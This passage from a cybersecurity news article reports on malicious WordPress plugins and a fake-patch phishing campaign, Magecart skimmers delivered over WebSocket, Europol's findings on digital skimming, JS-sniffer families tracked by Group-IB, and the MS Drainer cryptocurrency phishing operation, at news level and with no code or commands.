“Since many WordPress infections occur from compromised wp-admin administrator users it only stands to reason that they’ve needed to work within the constraints of the access levels that they have, and installing plugins is certainly one of the key abilities that WordPress admins possess,” Martin said.

The disclosure arrives weeks after the WordPress security community warned of a phishing campaign that alerts users of an unrelated security flaw in the web content management system and tricks them into installing a plugin under the guise of a patch. The plugin, for its part, creates an admin user and deploys a web shell for persistent remote access.

Sucuri said that the threat actors behind the campaign are leveraging the “RESERVED” status associated with a CVE identifier, which applies when the identifier has been reserved for use by a CVE Numbering Authority (CNA) or security researcher but the details have yet to be filled in.


It also comes as the website security firm discovered another Magecart campaign that uses the WebSocket communications protocol to insert the skimmer code on online storefronts. The malware then gets triggered upon clicking a fake “Complete Order” button that’s overlaid on top of the legitimate checkout button.

Europol’s spotlight report on online fraud released this week described digital skimming as a persistent threat that results in the theft, re-sale, and misuse of credit card data. “A major evolution in digital skimming is the shift from the use of front-end malware to back-end malware, making it more difficult to detect,” it said.


The E.U. law enforcement agency said it also notified 443 online merchants that their customers’ credit card or payment card data had been compromised via skimming attacks.

Group-IB, which also partnered with Europol on the cross-border cybercrime fighting operation codenamed Digital Skimming Action, said it detected and identified 23 families of JS-sniffers, including ATMZOW, health_check, FirstKiss, FakeGA, AngryBeaver, Inter, and R3nin, which were used against companies in 17 different countries across Europe and the Americas.

“In total, 132 JS-sniffer families are known, as of the end of 2023, to have compromised websites worldwide,” the Singapore-headquartered firm added.

That’s not all. Bogus ads on Google Search and Twitter for cryptocurrency platforms have been found to promote a cryptocurrency drainer named MS Drainer that’s estimated to have already plundered $58.98 million from 63,210 victims since March 2023 via a network of 10,072 phishing websites.

“By targeting specific audiences through Google search terms and the following base of X, they can select specific targets and launch continuous phishing campaigns at a very low cost,” ScamSniffer said.

]]>